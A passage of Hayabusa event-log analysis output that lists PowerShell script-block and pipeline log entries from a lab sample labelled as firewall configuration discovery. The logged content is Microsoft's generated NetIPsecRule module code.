$PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecPhase1AuthSet}, 'MSFT_NetConSecRuleMMAuthSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetIPsecQuickModeCryptoSet') -and (@('ByAssociatedNetIPsecQuickModeCryptoSet') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetIPsecQuickModeCryptoSet}, 'MSFT_NetConSecRuleQMCryptoSet', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBo",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.770 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"undParameters.ContainsKey('PolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = Microsoft.PowerShell.Utility\New-Object System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter] switch -exact ($PSCmdlet.ParameterSetName) { { @('ByIPsecRuleName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallProfile', 'ByAssociatedNetIPsecPhase2AuthSet', 'ByAssociatedNetIPsecPhase1AuthSet', 'ByAssociatedNetIPsecQuickModeCryptoSet', 'GetAll', 'InputObject (cdxml)') -contains $_ } { [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewPolicyStore')) { [object]$__cmdletization_value = ${NewPolicyStore} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewPolicyStore'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewGPOSession')) { [object]$__cmdletization_value = ${NewGPOSession} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewGPOSession'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) [object]$__cmdletization_defaultValue = $null [object]$__cmdletization_defaultValueIsPresent = $false if ($PSBoundParameters.ContainsKey('NewName')) { [object]$__cmdletization_value = ${NewName} $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_value; IsValuePresent = $true} } else { $__cmdletization_methodParameter = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{Name = 'NewName'; ParameterType = 'System.String'; Bindings = 'In'; Value = $__cmdletization_defaultValue; IsValuePresent = $__cmdletization_defaultValueIsPresent} } $__cmdletization_methodParameters.Add($__cmdletization_methodParameter) $__cmdletization_returnValue = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodParameter -Property @{ Name = 'ReturnValue'; ParameterType = 'System.Int32'; Bindings = 'Error'; Value = $null; IsValuePresent = $false } $__cmdletization_methodInvocationInfo = Microsoft.PowerShell.Utility\New-Object Microsoft.PowerShell.Cmdletization.MethodInvocationInfo @('CloneObject', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetIPsecRule.cmdletDefinition.cdxml-Help.xml }",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Copy-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Enable-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Disable-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Sync-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4103,info,,PwSh Pipeline Execution,"CommandInvocation(Export-ModuleMember): ""Export-ModuleMember"" ParameterBinding(Export-ModuleMember): name=""Function""; value=""Update-NetIPsecRule""",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4103_PowershellPipelineExecution.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"function Enable-NetIPsecRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetConSecRule')] param( [Parameter(ParameterSetName='ByIPsecRuleName', Mandatory=$true, Position=0, ValueFromPipelineByPropertyName=$true)] [Alias('ID','Name')] [ValidateNotNull()] [string[]] ${IPsecRuleName}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.IPsecMode[]] ${Mode}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecIn')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${InboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [Alias('SecOut')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.SecurityPolicy[]] ${OutboundSecurity}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${QuickModeCryptoSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase1AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Phase2AuthSet}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.KeyModule[]] ${KeyModule}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowWatchKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${AllowSetKey}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${RemoteTunnelHostname}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [uint32[]] ${ForwardPathLifetime}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${EncryptedTunnelBypass}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${RequireAuthorization}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${User}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Machine}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP2AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase2AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEP1AuthSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecPhase1AuthSet}, [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetIKEQMCryptoSet')] [ValidateNotNull()] [ciminstance] ${AssociatedNetIPsecQuickModeCryptoSet}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetConSecRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [Microsoft.Management.Infrastructure.CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByIPsecRuleName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase2AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecPhase1AuthSet')] [Parameter(ParameterSetName='ByAssociatedNetIPsecQuickModeCryptoSet')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${PassThru}) DynamicParam { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper = Microsoft.PowerShell.Utility\New-Object $script:ObjectModelWrapper $__cmdletization_objectModelWrapper.Initialize($PSCmdlet, $script:ClassName, $script:ClassVersion, $script:ModuleVersion, $script:PrivateData) if ($__cmdletization_objectModelWrapper -is [System.Management.Automation.IDynamicParameters]) { ([System.Management.Automation.IDynamicParameters]$__cmdletization_objectModelWrapper).GetDynamicParameters() } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Begin { $__cmdletization_exceptionHasBeenThrown = $false try { __cmdletization_BindCommonParameters $__cmdletization_objectModelWrapper $PSBoundParameters $__cmdletization_objectModelWrapper.BeginProcessing() } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } Process { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_queryBuilder = $__cmdletization_objectModelWrapper.GetQueryBuilder() if ($PSBoundParameters.ContainsKey('IPsecRuleName') -and (@('ByIPsecRuleName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${IPsecRuleName}) $__cmdletization_queryBuilder.FilterByProperty('InstanceID', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayName') -and (@('ByDisplayName') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayName}) $__cmdletization_queryBuilder.FilterByProperty('DisplayName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Description') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Description}) $__cmdletization_queryBuilder.FilterByProperty('Description', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('DisplayGroup') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${DisplayGroup}) $__cmdletization_queryBuilder.FilterByProperty('DisplayGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Group') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Group}) $__cmdletization_queryBuilder.FilterByProperty('RuleGroup', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Enabled') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Enabled}) $__cmdletization_queryBuilder.FilterByProperty('Enabled', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Mode') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Mode}) $__cmdletization_queryBuilder.FilterByProperty('Mode', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('InboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${InboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('InboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('OutboundSecurity') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${OutboundSecurity}) $__cmdletization_queryBuilder.FilterByProperty('OutboundSecurity', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('QuickModeCryptoSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${QuickModeCryptoSet}) $__cmdletization_queryBuilder.FilterByProperty('QuickModeCryptoSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase1AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_va",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1016-System Network Configuration Discovery/ID800-4103-4104-Firewall configuration enumerated (PowerShell).evtx 2021-10-25 16:23:05.786 +09:00,FS03.offsec.lan,4104,info,,PwSh Scriptblock Log,"lues = @(${Phase1AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase1AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Phase2AuthSet') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Phase2AuthSet}) $__cmdletization_queryBuilder.FilterByProperty('Phase2AuthSet', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('KeyModule') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${KeyModule}) $__cmdletization_queryBuilder.FilterByProperty('KeyModule', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowWatchKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowWatchKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowWatchKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AllowSetKey') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${AllowSetKey}) $__cmdletization_queryBuilder.FilterByProperty('AllowSetKey', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RemoteTunnelHostname') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RemoteTunnelHostname}) $__cmdletization_queryBuilder.FilterByProperty('RemoteTunnelEndpointDNSName', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('ForwardPathLifetime') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${ForwardPathLifetime}) $__cmdletization_queryBuilder.FilterByProperty('MaxReturnPathLifetimeSeconds', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('EncryptedTunnelBypass') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${EncryptedTunnelBypass}) $__cmdletization_queryBuilder.FilterByProperty('BypassTunnelIfEncrypted', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('RequireAuthorization') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${RequireAuthorization}) $__cmdletization_queryBuilder.FilterByProperty('RequireAuthorization', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('User') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${User}) $__cmdletization_queryBuilder.FilterByProperty('Users', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('Machine') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Machine}) $__cmdletization_queryBuilder.FilterByProperty('Machines', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) 